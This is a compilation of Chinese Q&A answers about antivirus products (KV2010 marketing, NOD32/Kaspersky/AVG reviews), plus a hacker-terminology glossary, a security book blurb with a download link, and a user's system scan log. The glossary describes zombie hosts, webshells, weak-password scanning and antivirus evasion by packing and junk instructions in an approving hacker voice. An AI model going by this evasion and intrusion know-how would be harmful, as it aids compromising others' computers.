1. 什么品牌的杀毒软件最好拜托各位了 3Q
江民杀毒软件KV2010系江民反病毒资深研发团队历时一年之久,悉心打造的一款新型全功能杀毒软件。采用全新动态启发式杀毒引擎,融入指纹加速功能,杀毒功能更强、速度更快。KV2010也是国内首家完美兼容微软WINDOWS7操作系统的2010版杀毒软件。 KV2010颠覆了传统的防杀毒模式,在智能主动防御、“沙盒技术”、内核级自我保护、虚拟机脱壳、云安全防毒系统、启发式扫描等领先的核心杀毒技术基础上,创新“前置威胁预控”安全模式,在防杀病毒前预先对系统进行全方位安全检测和防护,检测三大类29项可能存在的安全潜在威胁,提供安全加固和解决方案。 功能亮点: 一、全新引擎,动态启发式杀毒,指纹加速,杀毒更快、更强。 KV2010采用全新动态启发式引擎,采用动态启发和静态启发相结合的方式扫描未知病毒,提高了对未知病毒的启发识别能力;扫描时采用了指纹加速技术,在首次扫描后的正常文件中加入指纹识别功能,下次再扫描时忽略不扫,大大加快了扫描速度和效率。 二、29项安全防护,封堵所有病毒入侵通道,病毒无隙可入。 新增“江民安全专家”,在防杀病毒前预先对系统进行全方位安全检测和防护,检测三大类29项可能存在的安全潜在威胁,提供安全加固和解决方案。 1、病毒入侵的防御能力: 分析所有的病毒入口,检测这些入口是否有相应的安全防护并提供加固方案,这些病毒入口分别为:网页、邮件、移动U盘、网络下载、WINDOWS和第三方软件漏洞、网络共享、蓝牙等十余种病毒入侵通道。 2、病毒入侵的抵卸能力。 分析病毒入侵后,系统是否具有相应的抵卸能力:当病毒向外发送重要系统信息时,系统是否开启主动防御和隐私保护功能并提供解决方案;当病毒试图永久驻留硬盘时,系统是否开启文件监视功能;病毒入侵后试图偷取银行、网游帐号密码时,是否具有密码保护功能并提供解决方案;当病毒试图在线好友发送带毒网址时,是否开启即时通讯监视功能;检测是否具有僵尸网络程序的防护功能,防止黑客抓取“肉鸡”;反病毒隐身术,是否具有对Rootkit病毒的检测和防护功能,并提供解决方案;对具有反杀毒软件能力的病毒的防护,检测是否开启杀毒软件的自我保护功能,并提供加固或解决方案。 3、检测系统本地安全指数。检测病毒库更新情况,最后一次杀毒的时间,系统需要修复的项;流行木马扫描、未知病毒扫描,并提供加固或解决方案。 三、24小时监控网页挂马,恶意网址动态入库,网络畅游无忧。 江民恶意网页监控系统24小时不间断监控全国网页挂马情况,提取被挂马的恶意网址,并动态加入到杀毒软件恶意网址库,及时有效屏蔽恶意网址,这样,即使用户不小心点击到恶意网页,也可以有效阻挡病毒于系统之外。 四、增强智能主动防御沙盒模式,增强虚拟机脱壳,未知病毒克星。 采用沙盒模式的智能主动防御,能够接管未知病毒的所有可疑动作,在确认为系病毒行为后执行回滚操作,彻底消除病毒留下的所有痕迹。 增强虚拟机脱壳技术,能够对各种主流壳以及疑难的“花指令壳”、“生僻壳”病毒进行脱壳扫描。 五、全新三层防火墙,从应用层、协议层、内核层三层防范黑客攻击。 全新江民三层防火墙,实时监控网络数据流,创新三层规则防范黑客,将传统防火墙从应用层、协议层两层黑客防范,扩展至系统内核层三层防范。应用层防黑客利用系统、第三方软件漏洞远程攻击,协议层防范基于各种网络协议的异常数据攻击(如DDOS),预先设置上百种安全规则,避免各种来自网络的异常扫描、嗅探、入侵、开启后门,网络包捕获监视和处理端口异常数据包,确保网络畅通。 内核层监视并防范异常恶意驱动程序调用API,发现有异常行为即报警并阻断动作,避免黑客利用底层驱动绕开防火墙的阻拦,入侵或远程控制目标电脑。 六、增强云安全防毒系统,海量可疑文件数据处理中心,搜集病毒样本更多,升级速度更快。 能够监测并捕获更多的可疑文件或病毒样本,江民病毒自动分析系统自动分析可疑文件并自动入库,数据处理能力更强大,病毒库更新速度更快。 七、增强网页防马墙功能,动态更新网页挂马规则库。 基于木马行为规则的江民网页防马墙,能够监控和阻断更多的未知恶意网页和木马入侵,网页挂马规则库动态更新,与恶意网址库构成对恶意网页的双重安全保障,确保用户安全浏览网页。 八、增强系统漏洞管理功能,自动扫描、修复系统漏洞,新增第三方软件漏洞扫描、自动修复功能。 系统漏洞管理功能能够自动扫描、修复微软操作系统以及OFFICE漏洞,新增第三方软件漏洞扫描和自动修复,可以自动修复Flash、RealPlayer、Adobe pdf等黑客常用的第三方软件漏洞,避免病毒通过漏洞入侵电脑。 九、江民新电脑保护系统,系统灾难一键恢复,恢复系统到正常状态。 江民新电脑保护系统,在系统遇到病毒、误操作等灾难事件导致系统崩溃时,可以一键恢复系统至事故前正常状态,为用户电脑安全设下最后一道安全屏障。 十、病毒扫描、查杀速度更快 为了大幅提升扫描速度,KV2010创新了四大扫描加速技术,指纹加速扫描,超线程扫描技术,创新哈希(Hash)定位技术,精准判定病毒位置,新增流行木马“秒杀”技术,迅速清除流行木马及其变种(内置于江民安全专家内)。 十一、占用系统资源更少、防杀病毒效率更高 KV2010采用四大技术,减少系统资源占用,在确保杀毒和防御效果的前提下,给用户最好的使用体验。创新病毒库动态加载技术,智能读取病毒库,减少资源占用;杀毒模块智能连接技术,减少中间环节,降低资源占用;采用智能内存分配技术,充分提高内存使用效率,自动平衡CPU占用,消除系统各种“卡”“滞”现象
2. 请问杀毒专家崔衍渠先生。
NOD32防病毒系统 2.7 & 0utpost Firewall Pro 3.51
世界一流的防病毒技术
在全球的防病毒 产品当中,不论是资历还是获得的大奖数量,NOD32都足可以位居前列。NOD32反病毒引擎从技术角度来说几乎是无可挑剔的,这使其成为技术型防病毒软 件的典型代表之一。NOD32引擎所最为人称道的性能表现,在我们的测试中得到充分的展现。不超过三十分钟的海量文件扫描测试成绩是所有产品当中最好的一 个,不过与其它产品的距离并不是特别明显,事实上在处理海量的体积很小的文件时NOD32并没有绝对的性能优势。在安装了NOD32之后其实时监控程序可 以说对系统"毫无影响"。
即使我们运行很 多大型的应用软件,NOD32的病毒检测操作还是丝毫不会降低系统运行速度。未知病毒检测是NOD32反病毒引擎中最具技术含量的部分,也是相比很多产品 的最大优势。在实际测试当中,NOD32成功的发现了我们的未知游戏木马样本,而绝大多数产品都无法作到这一点,这个结果在一定程度上证实了NOD32未 知病毒检测引擎的能力。同样值得关注的一点在于,NOD32还将另外三个样本也识别为未知病毒,这三个样本分别是ani病毒变种、盗取密码的QQ木马以及 魔兽世界木马。从这一点可以看出,NOD32在检测中国本土流行病毒方面还有待改进。除了防范未知病毒之外,NOD32集成的"反隐藏"技术专门用于检测 潜藏在系统中的恶意软件,特别是那些植入到系统底层的Rootkit。
小贴士: NOD32集成了很多颇具特色的功能,例如可以通过电子邮件和Windows信使服务传递警告消息,这通常是企业级防病毒软件才具备的功能;另外, NOD32还能够兼容企业版中的远程遥控管理功能。NOD32的用户可以从ThreatSense.Net预警系统中接受关于病毒传播和发作的危险警告, 同时也可以将自己发现的可疑文件提交到ThreatSense.Net以帮助NOD32扩展病毒检测范围。
用户接口的优点与缺点
NOD32的用 户接口简洁而明晰,实时监控、扫描、更新、日志、设置等几个主要的功能组在程序界面上分级而列,只有在点击所需的功能之后,相关的界面才有在主窗体右侧弹 出,直观而且节省空间。不过从某种角度来说,NOD32在用户界面和操作方面的设计过于贴近专业用户了,初级用户可能不太情愿去记忆程序主界面上诸如 AMON、DMON、IMON、EMON这些实时监控程序的英文缩写。
卡巴斯基互联网安全套装6.0个人版
速度表现略有不足
从只有十几兆的 安装程序就可以发现,卡巴斯基的程序结构是相当精简的,实时监控程序在保证高效表现的基础上,占用的系统资源极低。一个值得关注的问题是,无论是启动实时 保护功能还是文件扫描操作,卡巴斯基都会首先对内存中的对象进行检测,这在很大程度上影响着卡巴斯基的性能表现。特别是启动操作系统的时候,卡巴斯基对启 动对象的检测会令计算机在最初的几分钟里处于高资源占用状态。
出众的反病毒引擎
如果翻开卡巴斯 基反病毒引擎的履历,很多人可能会惊叹到有如此之多的主流反病毒技术都是源自这个引擎的创造。在病毒检测方面,卡巴斯基始终是最有竞争力的一个产品,本次 测试中的表现也是名列前茅。卡巴斯基在扫描文件的时候会深入地分析文件中的每个片断,并有效的拆解加壳保护,这使得卡巴斯基可以更好的分析所扫描的文件是 否包含恶意代码。由于应用了iChecker与iSwift技术,卡巴斯基可以忽略那些在上次扫描之后未改变过的文件,这可以在很大程度上提高扫描速度。 当启用了相应的选项之后,卡巴斯基在第二次扫描测试所使用的目标分区时,扫描时间降低到了第一次扫描所用时间的不到百分之四十。在这个套件产品当中,卡巴 斯基扩展了自己的防护范围,除了传统意义上的计算机病毒之外,间谍软件、木马程序和骇客程序等类型的恶意软件也是卡巴斯基检测的重点。在发现这些威胁之 后,卡巴斯基会弹出警告窗口向用户提供详细的相关信息,并为用户提供处理建议。
主动出击对抗未知威胁
主动防御技术是 卡巴斯基的亮点之一,尽管从很早开始卡巴斯基就集成了针对未知病毒的保护功能,但是在当前的套件产品中,无论是技术的成熟性还是保护的范围都有了很大的提 升。基于对程序行为的分析,卡巴斯基可以发现一些利用旧有机制的恶意软件,比如一个更改操作系统对象并向外网发送连接请求的软件。对于经常使用微软 Office套件的用户来说,卡巴斯基不但集成了实时的病毒保护,而且其主动防御机制还提供了一系列增强的保护机制,基于对宏操作的控制,卡巴斯基的用户 在使用办公文档的时候可以减少很多担忧。
尽管主动防御机 制较惯常的基于威胁指纹的防护方式更加先进,但是必须特别关注这类机制的误警问题。在使用卡巴斯基的过程中我们发现,主动防御功能的反应似乎有些过分敏感 了,启动一个安装了Google工具条的IE浏览器也会触发卡巴斯基的告警。由于主动防御会将一些常用软件的操作识别为威胁,用户可能需要在使用过程中有 选择地关闭一些主动防御功能。
显着增强的用户接口
在进入6.0版 本之后,卡巴斯基的用户接口设计有了很大的改善。在用户操作层面,卡巴斯基更加快速、更加符合用户直觉。统一而且排列规整的功能元素以及直观易用的设置选 项,卡巴斯基与操作者的交互展现出很高的水准。例如,为非专业用户群体根据威胁程度的高低,卡巴斯基的告警窗口会呈现出不同颜色,很多诸如此类的细节证明 卡巴斯基正开始在技术之外的层面取得巨大的进步。
防火墙智能高效
卡巴斯基的防火墙组件具有相当的智能性,可以自动识别计算机上安装的网络应用程序并自动为其建立规则,在绝大部分情况下这些规则都是正确的。
也有一些常见的应用程序卡巴斯基没有办法识别,例如QQ 2007,卡巴斯基只发现了MSN程序而没有自动为QQ生成规则。
在安装的时候防 火墙组件就能够检测出计算机连接的网络,将本地网络设置为信任状态,并自动将外部网络设置成"隐身模式"。在端口静默测试中,即便是在默认的保护级别下, 1056个TCP端口也都处于隐秘模式,这意味着外网将很难从这台计算机获取信息甚至无法发现这台计算机的存在。在阻止反弹式连接方面卡巴斯基的表现也相 当不错,防火墙组件可以发现LeakTest和FirewallLeak建立的外向连接,而反病毒引擎内置的主动防御功能则阻止了利用IE组件向外发起连 接的FireHole。
附加功能有待提升
卡巴斯基提供了基本的反垃圾邮件功能以及一组有针对性的反间谍软件功能,对于互联网上流行的网络钓鱼、垃圾广告信息、恶意拨号、金融信息窃取等安全威胁,卡巴斯基都能提供一定程度的保护。
卡巴斯基的反垃 圾邮件组件能够与Outlook等常见的客户端很好地集成,并基于用户的需要组合特定的识别条件并设置权重值从而细致的设定识别规则。先进未必代表高效, 尽管卡巴斯基的反垃圾邮件功能集成了很多智能检测技术,但是在实际使用过程中卡巴斯基的检测比率并不理想。由于卡巴斯基的反垃圾邮件组件可以基于已经接收 和发出的邮件进行学习,随着使用过程的延长,其检测能力应该会有一定程度的改善。事实上,对于大部分附加防护功能来说,都要依赖于卡巴斯基自己的检测能 力,用户无法对其进行更多的设定和管理。 不过在这些略显简单的功能当中,卡巴斯基也展现出一些特色,例如可以设置特定的几个电话号码为可信任号码,除此之外的其它号码将无法在该计算机拨出。该功能对防范恶意的电话盗用和欺诈行为很有用处,特别式对于那些用于完成商业电话呼叫功能的计算机来说。
3. 黑客的专业术语
.肉鸡:所谓“肉鸡”是一种很形象的比喻,比喻那些可以随意被我们控制的电脑,对方可以是WINDOWS系统,也可以是UNIX/LINUX系统,可以是普通的个人电脑,也可以是大型的服务器,我们可以象操作自己的电脑那样来操作它们,而不被对方所发觉。 2.木马:就是那些表面上伪装成了正常的程序,但是当这些被程序运行时,就会获取系统的整个控制权限。有很多黑客就是 热中与使用木马程序来控制别人的电脑,比如灰鸽子,黑洞,PcShare等等。 3.网页木马:表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中,当有人访问时,网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。 4.挂马:就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里,以使浏览者中马。 5.后门:这是一种形象的比喻,入侵者在利用某些方法成功的控制了目标主机后,可以在对方的系统中植入特定的程序,或者是修改某些设置。这些改动表面上是很难被察觉的,但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接,重新控制这台电脑,就好象是入侵者偷偷的配了一把主人房间的要是,可以随时进出而不被主人发现一样。 通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor) 6.rootkit:rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。 7.IPC$:是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 8.弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码) 9.默认共享:默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。 10.shell:指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell 11.WebShell:WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等 12.溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。 13.注入:随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注意入。 14.注入点:是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。 15.内网:通俗的讲就是局域网,比如网吧,校园网,公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话,就说明我们是处于内网之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255 16.外网:直接连入INTERNET(互连网),可以与互连网上的任意一台电脑互相访问,IP地址不是保留IP(内网)IP地址。 17.端口:(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。 18.3389、4899肉鸡:3389是Windows终端服务(Terminal Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使用也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。 19.免杀:就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。 20.加壳:就是利用特殊的算法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如实现压缩、加密),以达到缩小文件体积或者加密程序编码,甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX,ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。 21.花指令:就是几句汇编指令,让汇编语句进行一些跳转,使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置,杀毒软件就找不到病毒了“。
4. 《黑客攻防技术宝典iOS实战篇》pdf下载在线阅读,求百度网盘云资源
《黑客攻防技术宝典》([美]Charlie Miller)电子书网盘下载免费在线阅读
资源链接:
链接:https://pan..com/s/1Ahf1gIfNRnICCAZPJJZbkg
书名:黑客攻防技术宝典
作者:[美]Charlie Miller
译者:傅尔也
出版社:人民邮电出版社
出版年份:2013-9
页数:320
内容简介:安全始终是计算机和互联网领域最重要的话题。进入移动互联网时代,移动平台和设备的安全问题更加突出。iOS系统凭借其在移动市场的占有率拥有着举足轻重的地位。虽然iOS系统向来以安全着称,但由其自身漏洞而引发的威胁同样一直存在。
《黑客攻防技术宝典:iOS实战篇》由美国国家安全局全球网络漏洞攻击分析师、连续4年Pwn2Own黑客竞赛大奖得主Charlie Miller领衔,6位业内顶级专家合力打造,全面深入介绍了iOS的工作原理、安全架构、安全风险,揭秘了iOS越狱工作原理,探讨了加密、代码签名、内存保护、沙盒机制、iPhone模糊测试、漏洞攻击程序、ROP有效载荷、基带攻击等内容,为深入理解和保护iOS设备提供了足够的知识与工具,是学习iOS设备工作原理、理解越狱和破解、开展iOS漏洞研究的重量级专着。
本书作为国内第一本全面介绍iOS漏洞及攻防的专着,作者阵容空前豪华,内容权威性毋庸置疑。Charlie Miller曾在美国国家安全局担任全球网络漏洞攻击分析师5年,并连续4届摘得Pwn2Own黑客竞赛桂冠。Dionysus Blazakis擅长漏洞攻击缓解技术,2010年赢得了Pwnie Award最具创新研究奖。Dino Dai Zovi是Trail of Bits联合创始人和首席技术官,有十余年信息安全领域从业经验,出版过两部信息安全专着。Vincenzo Iozzo现任BlackHat和Shakacon安全会议评审委员会委员,因2010年和2011年连续两届获得Pwn2Own比赛大奖在信息安全领域名声大振。Stefan Esser是业界知名的PHP安全问题专家,是从原厂XBOX的硬盘上直接引导Linux成功的第一人。Ralf-Philipp Weinmann作为德国达姆施塔特工业大学密码学博士、卢森堡大学博士后研究员,对密码学、移动设备安全等都有深入研究。
本书适合想了解iOS设备工作原理的人,适合对越狱和破解感兴趣的人,适合关注iOS应用及数据安全的开发人员,适合公司技术管理人员(他们需要了解如何保障iOS设备安全),还适合从事iOS漏洞研究的安全研究人员。
作者简介:Charlie Miller
Accuvant Labs首席研究顾问,曾在美国国家安全局担任全球网络漏洞攻击分析师5年,连续4年赢得CanSecWest Pwn2Own黑客大赛。他发现了iPhone与G1安卓手机第一个公开的远程漏洞,通过短信对iPhone进行漏洞攻击并发现了可以让恶意软件进入iOS的代码签名机制缺陷。作为圣母大学博士的他还与人合着了The Mac Hacker's Handbook和Fuzzing for Software Security Testing and Quality Assurance两本信息安全类图书。
Dionysus Blazakis
程序员和安全研究人员,擅长漏洞攻击缓解技术,经常在安全会议上发表有关漏洞攻击缓解技术、绕过缓解技术和寻找漏洞的新方法等主题演讲,因利用即时编译器绕过数据执行保护的技术赢得了2010年Pwnie Award最具创新研究奖。另外,他与Charlie Miller为参加2011年Pwn2Own大赛开发的iOS漏洞攻击程序赢得了iPhone漏洞攻击比赛的大奖。
Dino Dai Zovi
Trail of Bits联合创始人和首席技术官,有十余年信息安全领域从业经验,
做过红队(red teaming,又称“伦理黑客”)、渗透测试、软件安全、信息安全管理和网络安全研究与开发等多种工作。Dino是信息安全会议的常客,在DEFCON、BlackHat和CanSecWest等世界知名的信息安全会议上发表过对内存损坏利用技术、802.11无线客户端攻击和英特尔VT-x虚拟化rootkit程序等课题的独立研究成果。他还是The Mac Hacker's Handbook和The Art of Software Security Testing的合着者。
Vincenzo Iozzo
Tiqad srl安全研究人员,BlackHat和Shakacon安全会议评审委员会成员,常在BlackHat和CanSecWest等信息安全会议上发表演讲。他与人合作为BlackBerryOS和iPhoneOS编写了漏洞攻击程序,因2010年和2011年连续两届获得Pwn2Own比赛大奖在信息安全领域名声大振。
Stefan Esser
因在PHP安全方面的造诣为人熟知,2002年成为PHP核心开发者以来主要关注PHP和PHP应用程序漏洞的研究,早期发表过很多关于CVS、Samba、OpenBSD或Internet Explorer等软件中漏洞的报告。2003年他利用了XBOX字体加载器中存在的缓冲区溢出漏洞,成为从原厂XBOX的硬盘上直接引导Linux成功的第一人;2004年成立Hardened-PHP项目,旨在开发更安全的PHP,也就是Hardened-PHP(2006年融入Suhosin PHP安全系统);2007年与人合办德国Web应用开发公司SektionEins GmbH并负责研发工作;2010年起积极研究iOS安全问题,并在2011年提供了一个用于越狱的漏洞攻击程序(曾在苹果多次更新后幸存下来)。
Ralf-Philipp Weinmann
德国达姆施塔特工业大学密码学博士、卢森堡大学博士后研究员。他在信息安全方面的研究方向众多,涉及密码学、移动设备安全等很多主题。让他声名远播的事迹包括参与让WEP破解剧烈提速的项目、分析苹果的FileVault加密、擅长逆向工程技术、攻破DECT中的专属加密算法,以及成功通过智能手机的Web浏览器(Pwn2Own)和GSM协议栈进行渗透攻击。
5. 免费杀软
AVg比较好
AVG免费版是一款广受Windows用户欢迎的反病毒程序,它可以为用户提供反病毒、反间谍软件、反恶意软件等的安全防护功能。
概况
反病毒程序可以帮助我们的电脑防御木马,病毒,间谍软件,广告软件,rootkit,僵尸网络,蠕虫,漏洞威胁,流氓程序,以及威胁隐私安全的潜在威胁软件。那么AVG免费版在防御在流行的已知病毒方面究竟怎样呢?
AVG免费版具备有限的安全功能。AVG免费版可以防御病毒,蠕虫和间谍软件的威胁。AVG免费版提供的LinkScanner功能有效地拦截恶意站点。不过,AVG免费版无法防御欺骗站点,并且不提供rootkit防护功能。
AVG免费版支持Windows 7, Vista, XP和Windows 2000系统平台,而且LinkScanner兼容IE和Firefox浏览器。
在Windows 系统中,AVG免费版的设置非常简单。AVG在Vista中安装需要59 MB空间,在Windows XP中安装仅需57.26 MB空间。安装时,用户可以根据自己的需要选择是否安装AVG安全工具。
AVG的用户界面简洁。AVG的基本导航菜单位于窗口左侧,详细的导航是通过顶部的导航菜单。概述选项显示了所有的组件及状态。双击任何一个组件,主界面就会显示更多的信息。
AVG通过内置更新工具对其病毒库进行日常更新。值得一提的是,AVG更新工具还可以在下载或安装程序之前,提供程序更新信息。
处于闲置状态时,AVG的内存占用为5 MB(扫描时占用更多内存)。AVG免费版不提供快速扫描服务。AVG免费版还允许用户在Windows安全模式下运行命令行扫描。
性能
AVG的常驻保护盾(Resident Shield)在防御恶意文件方面略显不足。在对比AntiVir(小红伞)、Avast和微软Microsoft Security Essential的测试中,AVG并没有实时拦截恶意文件。用户必须打开包含恶意文件的文件夹,等待常驻保护盾检测威胁。
AVG的手动扫描可用于恶意软件扫描,但其检测率要低于90%。
LinkScanner和常驻保护盾都不是非常有效。当访问一些恶意站点或垃圾站点,以及进行一些不安全下载时,AVG免费版只能拦截6/18的意站点或不安全下载。总体而言,AVG免费版只能拦截一些低危威胁,无法拦截的高危威胁包括:
Alureon木马
SpyEye 木马
Kolab 蠕虫
Banker 木马
Mario Fev蠕虫
TDSS rootkit
Koobface蠕虫
Registry Easy 网站, 虚假注册表清理软件
Antivirus Soft, 流氓杀毒软件
PDF 漏洞
SWF漏洞
6. rootkit病毒什麽意思
Rootkit是指其主要功能为隐藏其他程式进程的软件,可能是一个或一个以上的软件组合。
广义而言,Rootkit也可视为一项技术。最早Rootkit用于善意用途,但后来Rootkit也被黑客用在入侵和攻击他人的电脑系统上,电脑病毒、间谍软件等也常使用Rootkit来隐藏踪迹,因此Rootkit已被大多数的防毒软件归类为具危害性的恶意软件。
Linux、Windows、Mac OS等操作系统都有机会成为Rootkit的受害目标。
7. 谁有这《矛与盾:黑客攻防命令大曝光》个和《黑客免杀攻防》这两本书pdf,求下载链接!谢谢!
我可以给你黑客攻防
8. 卡巴斯基频繁报告已检测到: 风险软件 Hidden object
我是楼主,附件在这里。
检测报告
[CODE]
2007-03-03,12:09:40
System Repair Engineer 2.3.13.690
Smallfrogs (http://www.KZTechs.com)
Windows XP Professional Service Pack 2 (Build 2600)
- 管理权限用户 - 完整功能
以下内容被选中:
所有的启动项目(包括注册表、启动文件夹、服务等)
浏览器加载项
正在运行的进程(包括进程模块信息)
文件关联
Winsock 提供者
Autorun.inf
HOSTS 文件
启动项目
注册表
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<SoundMan><SOUNDMAN.EXE> [(Verified)Realtek Semiconctor Corp.]
<ATIPTA><C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe> [ATI Technologies, Inc.]
<SMSERIAL><sm56hlpr.exe> [Motorola Inc.]
<EPSON Stylus C41 Series><C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_S10IC2.EXE /P23 "EPSON Stylus C41 Series" /O5 "LPT1:" /M "Stylus C41"> [SEIKO EPSON CORPORATION]
<kav><"F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"> [Kaspersky Lab]
<360Safetray><D:\360safe\safemon\360tray.exe /start> [奇虎网]
<StormCodec_Helper><"f:\Ringz Studio\Storm Codec\StormSet.exe" /S /opti> [N/A]
<TkBellExe><"C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot> [(Verified)RealNetworks, Inc.]
<UnlockerAssistant><"f:\Unlocker\UnlockerAssistant.exe"> [N/A]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><Explorer.exe> [(Verified)Microsoft Corporation]
<Userinit><C:\WINDOWS\system32\userinit.exe,> [(Verified)Microsoft Corporation]
<UIHost><"\Program Files\Logonui\Royale.exe"> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\klogon]
<WinlogonNotify: klogon><C:\WINDOWS\system32\klogon.dll> [Kaspersky Lab]
==================================
启动文件夹
N/A
==================================
服务
[Adobe LM Service / Adobe LM Service][Stopped/Manual Start]
<"C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe"><Adobe Systems>
[Ati HotKey Poller / Ati HotKey Poller][Running/Auto Start]
<C:\WINDOWS\system32\Ati2evxx.exe><N/A>
[ATI Smart / ATI Smart][Stopped/Auto Start]
<C:\WINDOWS\system32\ati2sgag.exe><>
[卡巴斯基反病毒6.0 / AVP][Running/Auto Start]
<"F:\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe" -r><Kaspersky Lab>
[EPSON Printer Status Agent2 / EPSONStatusAgent2][Running/Auto Start]
<C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe><SEIKO EPSON CORPORATION>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[Kingsoft Personal Firewall Service / KPfwSvc][Stopped/Auto Start]
<"f:\KAV2007\KPfwSvc.EXE"><N/A>
[Kingsoft Antivirus KWatch Service / KWatchSvc][Stopped/Auto Start]
<f:\KAV2007\KWatch.EXE><N/A>
[P4P Service / P4P Service][Running/Auto Start]
<C:\Program Files\Common Files\Sogou PXP\p2psvr.exe><Sohu.com Inc.>
[Windows XP / Windows XP ][Stopped/Auto Start]
<C:\WINDOWS\systemo.com.cn.ini><N/A>
==================================
驱动程序
[Service for WDM 3D Audio Driver / ALCXSENS][Running/Manual Start]
<system32\drivers\ALCXSENS.SYS><Sensaura Ltd>
[Service for Realtek AC97 Audio (WDM) / ALCXWDM][Running/Manual Start]
<system32\drivers\ALCXWDM.SYS><Realtek Semiconctor Corp.>
[AliIde / AliIde][Stopped/Boot Start]
<\SystemRoot\System32\DRIVERS\aliide.sys><N/A>
[ati2mtag / ati2mtag][Running/Manual Start]
<system32\DRIVERS\ati2mtag.sys><ATI Technologies Inc.>
[CmdIde / CmdIde][Running/Boot Start]
<\SystemRoot\System32\DRIVERS\cmdide.sys><CMD Technology, Inc.>
[Intel(R) PRO Adapter Driver / E100B][Running/Manual Start]
<system32\DRIVERS\e100b325.sys><Intel Corporation>
[kl1 / kl1][Running/Boot Start]
<\SystemRoot\system32\drivers\kl1.sys><Kaspersky Lab>
[klif / klif][Running/System Start]
<\??\C:\WINDOWS\system32\drivers\klif.sys><Kaspersky Lab>
